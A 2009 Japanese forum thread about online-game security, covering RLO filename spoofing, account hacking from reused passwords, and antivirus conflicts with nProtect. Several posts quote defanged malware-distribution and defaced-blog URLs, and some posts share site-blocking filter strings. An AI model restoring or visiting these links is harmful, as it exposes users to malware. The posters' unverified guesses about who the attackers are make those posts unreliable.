> このデータから、実に8割以上もの不正プログラムに、アイコン偽装の手法が取られているということが分かります。
円グラフの83%は「偽装なし」になってるのに、なんでそうなる〜(笑) <> (○口○*)さん<>sage<>09/09/29 09:20 ID:VwPjHtsx0<> >>557
表2の棒グラフでは水色が偽装ありになっているから、単に表1のキャプションが逆なのではと思った。 <> (○口○*)さん<>sage<>09/09/29 10:13 ID:uIk5qpQF0<> 上の記事メール送ったら直った <> (○口○*)さん<>sage<>09/09/29 10:16 ID:aE6l4T2i0<> 実際に目にする比率だとアイコン偽装が17%の方がしっくりくるんだけどねぇ。
RLO対策方法の部分には影響ないからいいけど。 <> (○口○*)さん<>sage<>09/09/29 16:07 ID:aE6l4T2i0<> MS、無料ウイルス対策ソフト「Security Essentials」29日公開
ttp://internet.watch.impress.co.jp/docs/news/20090929_318137.html

MSは、スルーするものが結構あるが、なぜか、大多数がスルーするものに対応してたり
検体入手方法が他とどっか違うのかなーって気がしてる。

VirusTotalに新項目として追加されるだろうか? <> (○口○*)さん<>sage<>09/09/30 12:13 ID:O0rZBAuz0<> 既にあるMicrosoftのバージョンが変わるだけかと。
OneCareを無料化したようなもんだし(OneCareは6月で販売終了)。 <> (○口○*)さん<>sage<>09/09/30 14:58 ID:LjdkFETV0<> ttp://www.atmarkit.co.jp/fsecurity/rensai/tipstoday08/tips01.html
ハックスレじゃなくてセキュリティスレの方がいいだろうか?
今どき怪しいファイルをさっさと開く人は減ったと思いたいけど
exeなら怪しんでもrcsやcodだったら開いちゃう人が居る可能性もある、と
あぷろだが認識しなくてもシステムは判別するjpgとか怖いよね〜 <> (○口○*)さん<>sage<>09/09/30 15:17 ID:ZsrFAxW50<> >>563
少し上の方を見てみよう <> (○口○*)さん<>sage<>09/09/30 15:33 ID:Qli7fwwn0<> >>563
あと、ハックスレとセキュスレは統合されて一つになりました(=このスレ) <> (○口○*)さん<>sage<>09/09/30 15:39 ID:LjdkFETV0<> ぎゃー、はずかしす!
まぁ「対策したけど何の意味があるのか分かってない」人に対して
手口の実例出したってことで1つ・・・w <> (○口○*)さん<>sage<>09/09/30 20:09 ID:LYFeXU0K0<> 公式にこんな告知がでてるから
最近アカウントハックが増加してるのかもしれないから
より一層注意が必要だね
ttp://www.ragnarokonline.jp/news/information/notice/item/13095 <> (○口○*)さん<>sage<>09/10/01 06:21 ID:XmVD42m40<> >>556 >>563

これ試して見ようと思ってローカルセキュリティポリシーを起動しようと管理ツールを
立ち上げると見当たらない
あれ?おかしいな?と思って調べて見ると
「WindowsXP HomeEditionにはローカルセキュリティポリシーが無い」
と言う今まで知らなかった事実が

今までProしか使って無くてPC新調した時にうっかりHomeにしてしまった事忘れてたぜ… <> (○口○*)さん<>sage<>09/10/01 08:10 ID:ybzD8Xzg0<> >>568
gpedit.mscもない? <> (○口○*)さん<>sage<>09/10/01 09:01 ID:B5UV+rwx0<> うちも適用させようと思ったらローカルセキュリティポリシーが無くてびっくりした
win2kはそもそもRLO対応してなかったぜ! <> 568<>sage<>09/10/01 09:51 ID:X8KxY7Ie0<> >>569
無かったっす
ホントびっくりだ

>>570
2kは試して無かったなあw <> (○口○*)さん<>sage<>09/10/01 11:47 ID:c4ZQ4o6G0<> 意外と知られていない事実だけど、XPのHOMEとProは中身はまったく一緒
何が違うのかって言うと、homeは一部機能を隠して「無いように見せている」だけ
ゆえにゴニョゴニョするとProと同じように使えたりもするんだけどもw
逆に言えばすでに書かれているとおり「ユーザーが自分でいじれない」ということになるわけで
このスレを見て自分で動けるレベルではhomeは逆に危ないと言えるわけ
regeditなんて一生触れないような永遠の中級者未満には
違いを認識することなく7000円くらいお得なだけで終わるんだけどもね・・・

2kはいろいろクセがあって不便な時もあるけど
こういうことになるとさすがNT系だなと言わざるをえない、セキュリティ面が強い <> (○口○*)さん<>sage<>09/10/01 11:53 ID:yTBVNcIJ0<> VistaHomeBasicの俺もないな
所詮HomeBasicだし>>572の言うとおり見えなくなってるだけなんだろうけど <> (○口○*)さん<>sage<>09/10/01 11:58 ID:RNNFuRRW0<> ローカルセキュリティポリシーが存在しないんじゃなくて
設定の変更ができないだけってのは仕組みを考えたら当然だ <> (○口○*)さん<>sage<>09/10/01 14:52 ID:8nCvRWfj0<> ローカルであろうとグループであろうと、セキュリティポリシーはレジストリの一部でしかない。
gpedit.mscやsecpol.mscといった管理スナップインはビジネス向けのXP Pro/Vista Business以上に
提供されている物であって、コンシューマ向けには基本的に不要であるとの考え方から提供されていない。
これらのツールは、システム管理者が一般ユーザーの権限を制約するのが目的なので。

ただし、レジストリの一部と言う点から分かるように、直接レジストリに設定を施せばHome系でもセキュリティポリシーを
機能させることは可能。
一応、今回のRLO絡みに触れているBlogもあったので引用。
ttp://d.hatena.ne.jp/marujx/20070505
ttp://hakkakudo.exblog.jp/5957285/

>>572
完全に一緒というのは少々語弊がある。
ファイル構造などが相似だとしても、Home系はボリュームライセンスとして契約できないなどの制約があるし。
それと、Windows2000(NT5.0)もXP(NT5.1)とXP x64(NT 5.2)も、Vista(NT6.0)も含めてNT系だぞ。
win2k当時はパーソナル/ビジネスの区別が無かったので(エンタープライズOSも未分離)、ポリシーエディタなども
普通に使えたけど。ただ、2kProを今後も使うには2CPU制限(物理/論理の区別無し)とか厳しい部分も多いけど。
XP以降はHome系が1ソケット(物理CPU)、Business以上が2ソケット対応。

余談だけど、XP系でいちばんお買い得なのはMCEだと思われ。
ドメインに参加できるのがインストール段階に限られる事を除けば、他はXP Proと実質同等。
価格もHome+2kくらいで売られていたし。 <> (○口○*)さん<>sage<>09/10/01 17:44 ID:ybzD8Xzg0<> >>572
HOMEもぎょにょればリモートデスクトップ(rdp)接続できる?
自分はrdpの為だけにXPPro買ってるんだが。。。 <> (○口○*)さん<>sage<>09/10/01 17:46 ID:RNNFuRRW0<> 元から必要ない機能は入っていないかと <> (○口○*)さん<>sage<>09/10/01 19:39 ID:kNWW+4Fz0<> 公式からめずらしくアカウントハックに関するアナウンスが

ttp://www.ragnarokonline.jp/news/information/item/13100

ttp://www.ragnarokonline.jp/news/information/item/13101

どうやら他所でもれたパスとかでアタックかかってるらしい <> (○口○*)さん<>sage<>09/10/01 19:48 ID:SyDBRnlV0<> >「ユーザー様の被害を未然に防ぐ為、第三者に利用された形跡のあるガンホーID
>に対し、現在のガンホーIDのパスワードを一時無効化する措置」を実施いたしました。

あちこちで「ログインできねー」が聞かれそうな予感
お知らせ読んでとっとと変えろと <> (○口○*)さん<>sage<>09/10/01 20:03 ID:rVFdbHQy0<> その「ログインできねー」はハクられ済みだしなぁ。。 <> (○口○*)さん<><>09/10/01 20:22 ID:gRDEemPL0<> 今回はageとくぜ。 <> (○口○*)さん<>sage<>09/10/01 20:39 ID:evb5CTrH0<> >>578
文面だけ見ると良くわからんのだが、
1.「癌の手落ちでID・PASSがどっかに漏れた」
2.「未確認のパス抜きウィルス(?)が出回っている」
どっちなんだろうね? <> (○口○*)さん<>sage<>09/10/01 20:49 ID:QNsEMhfm0<> >>582
俺的に内容を意訳するとこんな感じだ

癌「家からは流出してないけど垢ハクが流行ってるみたいだから気をつけろよ、
  ちょっと調べたらなんか別人っぽい人がログインしようとしてるIDがあったからそいつのIDはゲーム起動をロックした」

癌「他の会社と話し合ったらそっちも似たような感じらしかったんで、やばそうなやつのIDはパスワード無効にした。
  後でメール送るからパスワード変更しとけよ。該当じゃないやつも一応やっとけ」

IDやらPASSがもれた理由については特に何も言ってない
強いて言うなら1じゃないよってだけ <> (○口○*)さん<>sage<>09/10/01 20:52 ID:xua/j3mC0<> 流出してたとしてあの癌様が素直に早期発表するとも思えないんだがな・・・。

むしろこの発表に危機感すら覚える。
詳しくは言えないが、相当ヤバい事になってるから注意喚起はしておこう、みたいな。 <> (○口○*)さん<>sage<>09/10/01 21:02 ID:rVFdbHQy0<> >>583
>「ユーザー様の被害を未然に防ぐ為、第三者に利用された形跡のあるガンホーID
>に対し、現在のガンホーIDのパスワードを一時無効化する措置」を実施いたしました。

>第三者に利用された形跡のあるガンホーID <> (○口○*)さん<>sage<>09/10/01 21:15 ID:gRDEemPL0<> 他社から流出したIDとPASSを辞書に、ブルートフォースアタックを仕掛けられた。

だから対策したって告知だと思うぞ。 <> (○口○*)さん<>sage<>09/10/01 21:18 ID:AthZ/l970<> アカハックする人ってやっぱりマフュアとかギャングとか
そういうのが関係してるのかな? <> (○口○*)さん<>sage<>09/10/01 21:51 ID:aH2tUWBx0<> >>584
この手の警告としては遅い方だよ
例えばWebMoneyなんかで「IDやパスワードを他サイトと共有するな」旨の警告を散々してる

実害が確認できてしまったから動いたという感触

>>586
どうでもいいツッコミなんだけど、それは総当たりと言うのかな
力ずくと言うにはもう少しスマートだし
とはいえDictionary attackと呼ぶには「辞書」の意味合いが少し違うし・・・なんだろ? <> (○口○*)さん<>sage<>09/10/01 21:56 ID:AthZ/l970<> >>588
アカウントの管理が面倒なのを理由にIDやパスワードを他サイトと共有する人って多いしな


面倒な管理を我慢してでもIDパスを同じものにせずにする事で被害を防いだり抑えるか
同じにして楽なぶんハッキングの際のリスクが高くなるか

パスワードの長さも入力が面倒だけどと文字数が少ないと危ない
面倒になっても文字数が多いほうが安全になる <> (○口○*)さん<>sage<>09/10/01 23:39 ID:gRDEemPL0<> 書いてて思ったんだけどね、総当たりというにはウーンと。

でも一番近いのでそう書いてみた。
普通、正解のIDとPASSが掲載された組み合わせの辞書なんてないからなぁ。 <> (○口○*)さん<>sage<>09/10/02 00:13 ID:H7rHiiL+0<> AIONでのアカウントハック状況とか
ttp://www.4gamer.net/games/030/G003061/20091001008/

これをまとめると垢ハックの原因は
・セキュリティアップデートをしていない
・0day攻撃くらったときに盗まれたパスを放置してて今になって盗まれてる
・他社とのIDパス共有
・ツールやRMTサイト自体が罠
・すでに盗んでいるキャラの場合ある程度監視していてキャラが育ってから盗むこともある

だいたい既知のことだけど、ここでもやっぱり他社とのID、PW共有について触れられてる

エムゲームがあやしい?
ttp://jfk.2ch.net/test/read.cgi/mmo/1251727288/915-923
このときやられてた?
ttp://www.4gamer.net/games/034/G003443/20090518033/

まあ他のルートもあるだろうし、あくまで可能性なだけ <> (○口○*)さん<>sage<>09/10/02 03:00 ID:mmmCl5pc0<> シルバーウィークが終わったこの時期にねぇ・・
いかにも大規模にネカフェでIDパス抜きまくって回収したデータをもとに活動を始めましたって感じだな。
ROからの流出ではないにしても他社MMOもこのシルバーウィーク期間中に
ネカフェタイアップキャンペーンやってると思うし。 <> (○口○*)さん<>sage<>09/10/02 09:32 ID:M9cYz/6w0<> >>562
どうも各社とも、ネカフェがハックラの温床ってことを隠したいように見えるね。
公で騒がれたことが一度もないのは不自然だ。 <> (○口○*)さん<>sage<>09/10/02 10:47 ID:Llmd4rjN0<> このスレが適当かどうかわかんないけど

さっきAviraのUpdate時の広告で表示されてたんだけど、
Aviraの日本語版が12/1にリリースだそうです <> (○口○*)さん<>sage<>09/10/02 11:17 ID:VZPqWc3J0<> >>594
うん、リリース予定になってるね。

独Avira、無償ウイルス対策ソフトの日本語版を提供へ
ttp://www.itmedia.co.jp/enterprise/articles/0909/24/news075.html

独Aviraの無料ウイルス対策ソフトが10周年、年末までに日本語版も
ttp://internet.watch.impress.co.jp/docs/news/20090917_316128.html <> (○口○*)さん<>sage<>09/10/02 11:56 ID:Llmd4rjN0<> >>595
お、そんな前に記事になってたんだ。見落としてた。thx <> (○口○*)さん<>sage<>09/10/02 13:13 ID:7JVIfmfL0<> ここのスレ住人てPFWは何使ってる?

Atom330のIONベア買って来て組んだんだが、ソフト導入に悩んでる。
CPU:Atom330
メモリ:1G
OS:WindowsXPPro SP3

他のPCではSunbelt使ってたんだけど乗り換えようかなと思ってて聞いてみたんだけどスレチかな? <> (○口○*)さん<>sage<>09/10/02 13:55 ID:pOf3aCjO0<> Kaspersky Internet Securityのそのままつかってる <> (○口○*)さん<>sage<>09/10/03 00:14 ID:a7E+eyHa0<> PC Tools5 使ってたけど、6にしたらPCが不安定になったので存在自体を抹消した。
次になに使うか検討中。(なんでもいいからさっさと入れとけというのがこのスレ的には正解) <> (○口○*)さん<>sage<>09/10/03 18:05 ID:4+6l1FFG0<> 私は Sygate Personal Firewall 入れてる。
簡単ながら割と細かいところまで設定できるし、機能もそう悪くないと思う。
今のところ特に問題も起こってないし。 <> (○口○*)さん<>sage<>09/10/04 19:04 ID:IGMBK76B0<> 俺はサブでcomodo使ってる。
メインはカスペだけど。
comodo+SpyBotだな。

日本語対応しててウィルスとFW両方ついててフリーでそれなりだし。
ただどこぞの雑誌の検証によるとゲームの垢ハック検知ができなかったそうだから、その分をSpyBotいれてる。
AVGだと検知したらしいんだが、AVGはFWがついてないからなー
以前はAVG+PcToolsだったんだが、上でもでてるようにPcToolsはちょっと腐ってるようなのでやめた。
他にいいFW単体があれば、AVG+それでもいいんだけどなぁ。
ちょっと設定がややこしいので中級者向けだけどな、comodoは。
AVGは初心者でも使える感じ。 <> (○口○*)さん<>sage<>09/10/04 21:48 ID:4q4WYHlZ0<> 結局、使いこなせないと意味無いからな、ツールは。
よくわからんちんな奴は、ノートンとか野放しにしておいて勝手にやってくれる奴にしとけ。 <> (○口○*)さん<>sage<>09/10/04 23:34 ID:LDejDcJX0<> >>602
野放しにして勝手に〜ってそういうやつがソフト入れてこれで大丈夫と安心して
危ない所行って引っかかってるんじゃね? <> (○口○*)さん<>sage<>09/10/05 03:57 ID:NnAXTd9E0<> セキュリティソフトを導入しているからと言って、危険サイトや脆弱性に関しての
情報を得ようとしないのもモラルハザードの一種だよね。 <> (○口○*)さん<>sage<>09/10/05 08:48 ID:+VUP8YuF0<> 間違ってはいないが、現実的でない答えだよ。世間一般的には。 <> (○口○*)さん<>sage<>09/10/05 09:33 ID:rbnNxBfk0<> セキュリティソフト買う意味…何かあった時のイイワケ用

「入れてはいたんですけどねぇ、あはは」 <> (○口○*)さん<>sage<>09/10/05 13:01 ID:NgQMfjPZ0<> セキュリティソフトを導入する意味…感染したのに気づく為

「感染したから、リカバリーしないと(泣」 <> (○口○*)さん<>sage<>09/10/05 16:28 ID:wtzyb27k0<> 84 名前:asd 投稿日:09/10/05 16:21 ID:QdWGn90X0
【RO】チェイサーソロ、バキュームキャンプ←
http://www■nicovedeo■com/videocom/A1028sfy■0929■zip

Registrant:
Organization : guo yongkai
Name : guo yongkai
Address : fu jian sheng long yan shi xin luo qu xi nan zhong yang xin cun
City : longyan
Province/State : FJ
Country : cn
Postal Code : 364000 <> (○口○*)さん<>sage<>09/10/05 16:46 ID:PmTFLGIp0<> >>607
感染したことに気づかないでいると、汚染源になってしまうこともあるので
それはある意味では正しい。
ロクなセキュリティソフトを入れてないノートPCを使ってた知り合いが
会社のPCに感染させて、業務を丸一日停止させたことがあったよ…。 <> (○口○*)さん<>sage<>09/10/05 17:41 ID:wlrSKRkf0<> >>608
どこか知らんがRO2板も同一の内容で来てたな <> (○口○*)さん<>sage<>09/10/05 19:03 ID:UcYstBXz0<> >>609
感染したらリカバリーするからといって全く対策しない奴もいるけどな

当然、リカバリーして数日後には感染してたけどw <> (○口○*)さん<>sage<>09/10/05 20:15 ID:Xpavf+3Y0<> 毎度どこかの中の人です。

>>608
同様の行為がこちらにもありました。

Date : 1254730770(2009/10/05 17:19:30)
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 219.67.121.243(ofsfx-03p4-243.ppp11.odn.ad.jp)

今回はnicovedeoの文字列で弾けましたが、いつか来ると思っていた
問題に遭遇しました。つまり、ブラウザの処理言語設定から中国語が
除外されてしまった事です(これのおかげで今までは投稿行為をブロックできていた)。
偶発的なのかそうでないのかは分かりませんが、気を許す事が出来なくなりました。
どうしようもないのでODNからの投稿を全規制しています。 <> (○口○*)さん<>sage<>09/10/05 20:18 ID:wlrSKRkf0<> ROやオンラインゲーム用のハニーポットサイトは無いのかな <> (○口○*)さん<>sage<>09/10/05 20:21 ID:nHlckmc/0<> >>608
あまり検出率よくないので各社に提出しました。 <> (○口○*)さん<>sage<>09/10/05 20:32 ID:sadEJZPp0<> >>612
ODN相変わらずですね。
少々短絡的かも知れませんが、UAのチェックをもう少し厳しめにしてみるのはどうでしょう。
.NET CLR関連が含まれていない≒連中のことだからSPもWUも未適用である、という可能性が高いので。

# ほんとはMSIE 6.0もそろそろ弾いていい頃合いなのではと考えたりしてますが :p <> (○口○*)さん<>sage<>09/10/05 22:48 ID:Xpavf+3Y0<> >>615
 改竄された場合は管理人失格だと自分に対して律してはいるところではありますが、
規制誤爆は忌むべきものだとも自分ルールとして思っています。ですのでUA文字列での
規制は多分行わないでしょう。偽装も容易ですし。

# そもそも言語での規制も容易に変更が可能なので理想的なものではなかった。
# 海外動画サイトを利用するためか、日本語を外して規制を食らっていた人も
# 居たようですし。

 IE6以下向けには www.ie6nomore.com を表示するようにしてます
.NET CLR関連無しはMSUpdateを促すというのもありかもしれません

 ODNにはその都度通報していますが、ODNの契約のシステムが変更されないか
攻撃者が矛先をどこかに変えるとか無い限りはこのまま攻撃は続くだろうと思います。
残念な事ですが。 <> (○口○*)さん<>age<>09/10/05 23:43 ID:mLw9+55N0<> 今月の呼びかけ
「 あなたのオンラインゲームのキャラクターは狙われています! 」
― ある日突然、ログインしたらアイテムが空っぽに?! ―
ttp://www.ipa.go.jp/security/txt/2009/10outline.html <> (○口○*)さん<>sage<>09/10/06 00:17 ID:CohMJkWV0<> host名が ofs*.\.odn\.ad\.jpは無条件にアク禁にしても困らないからな
昔、RO関係じゃないけどBBSをやっていた時は永久アク禁にしてたよ

もう一つ有名なodnのhostがあったと思うけど最近見ないな <> ofsfb-13p3-105.ppp11.odn.ad.jp<>sage<>09/10/06 00:24 ID:adxBRUci0<> 巻き添えになるほうは困るけどね <> (○口○*)さん<>sage<>09/10/06 01:14 ID:TImmOzvQO<> アカハックにあった事がある人に聞きたい事が。
やっぱりアイテムやゼニーは全部持って行かれる感じなんですか? <> (○口○*)さん<>sage<>09/10/06 05:20 ID:QOaMv0B90<> ガンホー・オンライン・エンターテイメント社の「ラグナロクオンライン」が起動しない
http://esupport.trendmicro.co.jp/Pages/JP-2075879.aspx

セキュリティソフトとしてはただし・・・・・・・・くないのか?今回はnProを検知した訳じゃないから。
nProと通信する処理辺りが引っかかったのかもしれないけど。 <> (○口○*)さん<>sage<>09/10/06 05:51 ID:iaRGBaQu0<> というかRO起動しようとするとTROJ_Generic.DITが検出されるんだよな

誤検出っぽいけど。 <> (○口○*)さん<>sage<>09/10/06 08:37 ID:c3aB6amE0<> >>620
そんなことを聞いてどうするのかと <> (○口○*)さん<>sage<>09/10/06 09:08 ID:CgPc3SUS0<> 新しくPCを買うにあたってノートンゴーストのようなバックアップソフトを導入したくて
何がいいか相談したかったのだが「セキュリティ対策、質問・雑談」スレってなくなっちゃった? <> (○口○*)さん<>sage<>09/10/06 10:00 ID:B0umDj9U0<> >>624
あれはRO板の事情によるものだったしね
LiveRO統合した今では不要なもの

バックアップツールは個人用途だと環境スレでいいんじゃない?
セキュリティに関する利用方法はできるとはいえ、そういう観点から選ぶものじゃないと思うし <> (○口○*)さん<>sage<>09/10/06 10:33 ID:cBB8if7O0<> >>620
中華は根こそぎ持って行く事が多い(レア意外は残す場合もあり)
知り合いにやられる場合財布から小銭を抜き出す様に盗む奴も居たらしいよ
後者は垢共有でパス教えてるから自業自得なハック以前のハックか <> (○口○*)さん<>sage<>09/10/06 11:37 ID:asUZw0dU0<> 本日より、KIS2010の無料バージョンアップ来てる
サブPCにKAV2009入れてるけど、KAVは2009で販売終了と共にverupは無いようだね
KIS2010より1アクティでPC2台までいけるようだから、2009のライセンス切れてから入れるとするかな <> (○口○*)さん<>sage<>09/10/06 11:39 ID:QOaMv0B90<> >>624
それはここのことだが、バックアップソフトはセキュリティともROとも関係無いので適切なスレはないな。
雑談スレ辺りで相談するか、大人しく2chの適切な板を探すのがいいと思う。

>>625
RO環境と無関係なものを誘導されても困るぞ。 <> (○口○*)さん<>sage<>09/10/06 12:18 ID:B0umDj9U0<> >>628
そうかnPro環境下で動かすもんでもないしなw <> (○口○*)さん<>sage<>09/10/06 14:27 ID:QOaMv0B90<> 物質スレなら誘導しても問題ないかなと、>628を送信した後に気付いた。 <> (○口○*)さん<>sage<>09/10/06 17:20 ID:TImmOzvQO<> >>623
もう戻っては来てるからいいんだけど、去年の12月にアカハックの被害にあった時に摩訶不思議だったから気になってね。

>>626
やっぱり根こそぎが多いんですね。
下らない質問に答えてくれてありがとう <> (○口○*)さん<>sage<>09/10/06 17:38 ID:BpVWW9Yk0<> 俺の場合は、それなりの値打ち物以外はほとんど残してったな。
おおよそ2M以下の価値の物はほとんど残ってた。
相手は中華。 <> (○口○*)さん<>sage<>09/10/06 22:18 ID:GS4w4myO0<> >>627
2010にしたらロジのsetpointUがロガー扱いされてどうも上手く動作しないなー
後nProを間違えて許可じゃなく制限付き許可にしたらROが起動しなくなった。
許可に変えたいが、どこで変えるのかが分からん・・・ <> (○口○*)さん<>sage<>09/10/06 23:13 ID:XTOMJgrE0<> >>633
 左の「アプリケーションコントロール」
→右のグラフのあたりをクリック
→上のセレクトボックスから「今日起動」(みたいな選択肢)

・・・だった気がする
2010にしたら調子が悪くなって、2009に戻したので、詳しくは覚えてない <> (○口○*)さん<>sage<>09/10/07 03:14 ID:Ui5wYyDU0<> MixiいくとカスペでTrojan-Downloader.Script.Genericの反応が
なんだか誤検知ではなさそうだけど

【mixi】なんでも雑談&質問スレ27【総合】
ttp://pc12.2ch.net/test/read.cgi/sns/1254189333/231

231 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/07(水) 01:14:32 ID:7imOPxOH0
カスペだけじゃなくNoScriptもmixiを遮断するぞ
クロスサイトスクリプティングしとるわ。
だからhttpsじゃひっかからないんだわ。 <> (○口○*)さん<>sage<>09/10/07 04:52 ID:P38ouwPv0<> カスペ2010の人柱してきたんで報告。

2010はどうもnProtectと相性最悪。
というかnProがカスペ自体を弾こうとしてお互いにチャンバラしているみたいだ
そのせいで一度でもRO等のnProゲーを起動すると
日本語入力がおかしくなったり、タスクバーがフリーズする。

ROやる奴でカスペユーザーは2010はやめとけ、今は時期が悪い
上のレスにもあるように誤検出問題もあるしな。
修正パッチ出るまで2009で様子見しろってこった
2009に戻すだけで2時間近く時間無駄にしたわw

しかし2009メンテナンスパックの時といい、カスペってほんと初期の性能がクソだなw
修正パッチ前提で設計されているとしか思えん
検出率も以前のように高水準という訳でもないようだ。
先月の検出率テストの結果だと今はもうノートンやマカフィーにも負けてる <> (○口○*)さん<>sage<>09/10/07 08:06 ID:ASeh3Ceg0<> 2週間後にカスペのライセンス切れるからに課金しなきゃ
いけなかったけど、保留してAVGでも入れておくかぁ… <> (○口○*)さん<>sage<>09/10/07 08:37 ID:KZPv7RIb0<> AVGの中の人たちはMSEの登場を歓迎していたな
MSのがんばり次第だが、もしかしたら最も相性問題が発生しにくい可能性もある。
一度試してみては? <> (○口○*)さん<>sage<>09/10/07 15:39 ID:3cRWeQqH0<> ComodoもnProとはかなり相性悪いんだよなあ

ハンゲの報告
http://board.hangame.co.jp/bbs/notice/index.asp#Content=7977

総当り攻撃があったと書いてあるね <> (○口○*)さん<>sage<>09/10/07 15:54 ID:Ui5wYyDU0<> サブでセキュリティエッセンス使ってみてるけど
ROフォルダ除外してるし今の所これと言った不具合はないね <> (○口○*)さん<>sage<>09/10/07 15:56 ID:KZPv7RIb0<> >>640
除外しないと何かあった?
もし経験があったらでいいので教えてくださいな。 <> (○口○*)さん<>sage<>09/10/07 16:04 ID:WgSLKrxV0<> うちの環境では不具合は発生していないよMSE。

Forefrontでも大丈夫。(MSEと同じエンジン?の企業版) <> (○口○*)さん<>sage<>09/10/07 16:38 ID:Ui5wYyDU0<> エッセンシャルだったね
確認したのは除外しないとパッチ画面のゲーム開始から蔵立ち上がるまでの時間が長くなるだけだけど
nProと何か起こしてそうだし先に除外しておいた方がいいと思っただけ <> (○口○*)さん<>sage<>09/10/07 19:18 ID:M5ZAiImH0<> うちの場合は除外しないでも行けてます>MSE
ところでこれって、Windows Defenderだっけ、あれと微妙に被ってる気がするんだけど
別物という考え方でいいのだろうか <> (○口○*)さん<>sage<>09/10/07 19:20 ID:WgSLKrxV0<> >>644
MSEにWindows Defenderは含まれてる。

VISTA以降はサービス止まる、XPは手動で止める必要があるとか。
不具合は無いけど重くなるだけだし。 <> (○口○*)さん<>sage<>09/10/07 19:21 ID:M5ZAiImH0<> >>645
おーそうなんだ、素早い回答ありがとう
わが家はXP環境多いので止めておくよ <> (○口○*)さん<>sage<>09/10/07 19:40 ID:DcwMlSPb0<> カスペ2010
nPro起動後はタスクバーフリーズするな
RO以外のネットゲやってないから他わからないが、nProとカスペが衝突してるみたい <> (○口○*)さん<>sage<>09/10/07 19:42 ID:VkO3mFIQ0<> セキュリティソフトがnProのご機嫌取りをさせられるなんて嫌なもんだな <> (○口○*)さん<>sage<>09/10/07 19:56 ID:BZCs2caj0<> カスペ2010とnProが競合する件、2ch経由で見にいった海外のフォーラムによると、
セキュリティキーボードとnProが競合しているらしい

一度アンインストールして、カスタムインストールでセキュリティキーボードを切るか、
セキュリティキーボードのサービスを停止すると直ると書いてあった
(大雑把に意訳しただけなので合ってるかは不明)

どうせ12月にWindows7対応のアップデートが出るし、
それまでは無理にアップデートしなくて良さそう <> (○口○*)さん<>sage<>09/10/08 11:26 ID:JriUSIfK0<> spamメール…もとい、メールマガジンで紹介されていた記事。なんかの参考になるかな?

Yahoo! JAPAN IDとパスワードが誰かに勝手につかわれていませんか?
ttp://drd.yahoo.co.jp/dm/s/20005/20005254_300058891_25.html <> (○口○*)さん<>sage<>09/10/08 11:34 ID:wgxq2Orf0<> ログインアラートってのはいいよね
ネトゲにそのまま適用はできないけれど <> (○口○*)さん<>sage<>09/10/08 11:39 ID:JriUSIfK0<> Hotmailに加えてGmailやYahoo!も、アカウント流出被害が拡大
http://internet.watch.impress.co.jp/docs/news/20091007_320058.html

KLab、“ホワイトリスト型ウイルス対策ソフト”を無償公開
http://internet.watch.impress.co.jp/docs/news/20091007_319942.html <> (○口○*)さん<>sage<>09/10/08 17:59 ID:S5wkgXq70<> >>651
エボプロSNSを正式運用移行する時にでも、連動タグ機能でも実装できないものかな。
Xbox Liveのゲーマータグのように、Web上からオンライン/オフラインの視認ができるような仕組みを作る。
SNSのフレンド設定と協調し、状態の非公開(自分のみ確認可能)/限定公開/全公開のような区分を
ROアカウント別に割り振れれば尚良し。 <> (○口○*)さん<>sage<>09/10/08 18:12 ID:vYv8YPRy0<> 自身のROブログに置いてあるアクセス解析からアクセス元のサイトに飛んでいたんですが・・・

http://analyzer53■fc2■com/ana/processor■php?uid=629124

上記アドレスに飛んだところ、自動でファイルのDLページに飛んだらしく
ファイル保存の確認画面が出てきました。ファイル名は「processor.php」です。
fc2のアドレスだったのですっかり油断していたのですが、これはアカハックの可能性はあるんでしょうか? <> (○口○*)さん<>sage<>09/10/08 18:17 ID:oJk71jx00<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■ <> (○口○*)さん<>sage<>09/10/08 18:26 ID:vYv8YPRy0<> 少し冷静になってから改めて調べたところ自己解決しました。
fc2公式にアクセス解析のよるバグだと掲載されています。

また、こういった形式での質問は場違いだったようですね。
突然のことだった為かなり慌てて衝動的に質問してしまいました。
お騒がせ&スレ汚し大変失礼しましたm(_ _)m <> (○口○*)さん<>sage<>09/10/09 07:58 ID:WqpJ6aWu0<> 再び福建中華によるFC2ブログ改竄が確認された。通報済み。
jyuseijyun■blog94■fc2■com
4gameranking入り。

2009/10/09 1時ごろにハニーポット状態の赤石掲示板に集中投下。
2007年2-3月ごろに少し記事を書いた後放置されたものがやられたようだ。

最近あちこちでパスワード変更のお知らせが出ているくらいだしアカウント管理にはくれぐれも気をつけてくれよな! <> (○口○*)さん<>sage<>09/10/09 11:51 ID:1SZGR+Zz0<> またAcrobatに脆弱性
ttp://www.itmedia.co.jp/enterprise/articles/0910/09/news017.html


JavaScripをOFFにしても攻撃を回避できないなんて話もあるから
パッチの提供される13日までは信頼できないpdfは開かない方がよさそう <> (○口○*)さん<>sage<>09/10/09 14:09 ID:tHBgaJV/0<> 10月のMSパッチ、「緊急」8件を含む計13件
http://www.itmedia.co.jp/enterprise/articles/0910/09/news016.html

日本時間で14日に出ます <> (○口○*)さん<>sage<>09/10/09 14:40 ID:1SZGR+Zz0<> >>657
いま657のサイトに仮想マシンでアクセスしたら
4gamerankingへのリンクが無くなっている

ページ自体は残っているからFC2側が何かしたわけでは無さそう <> (○口○*)さん<>sage<>09/10/09 15:12 ID:+4AUmzkR0<> フィッシングじゃないかも説
まあどっちもありそう

Hotmail/Gmailアカウント流出、専門家がフィッシング攻撃説に疑問符
ttp://www.computerworld.jp/topics/vs/164189.html

>>657
そういうとこは再挿入もあるから注意だね <> (○口○*)さん<>sage<>09/10/09 17:38 ID:wdhqc5AV0<> >>649
セキュキーボードインストールしなくてもやっぱりタスクバー固まって再起動するしかなくなるなぁ。
nProマジでもう撤廃しろよ。
前の軽い奴に変えろと。 <> (○口○*)さん<><>09/10/10 01:16 ID:dDKSENqZ0<> また告知でたし上げとくか <> (○口○*)さん<>sage<>09/10/10 01:28 ID:wyDh0XXz0<> 意味分からんよ
上げるくらいなら告知はれ <> (○口○*)さん<>sage<>09/10/10 01:54 ID:8nsll3jv0<> 告知ぐらい、最低限よもう。
そうでなければスルーしよう。 <> (○口○*)さん<>sage<>09/10/10 02:58 ID:r4rz+P5o0<> 【重要】「アカウントハッキング」についての追加報告およびお願い  [2009/10/09] >>NEW!!
ttp://www.ragnarokonline.jp/news/information/notice/item/13119

【重要】一部のお客様のガンホーIDパスワードの強制変更措置について [2009/10/01]
ttp://www.ragnarokonline.jp/news/information/notice/item/13101

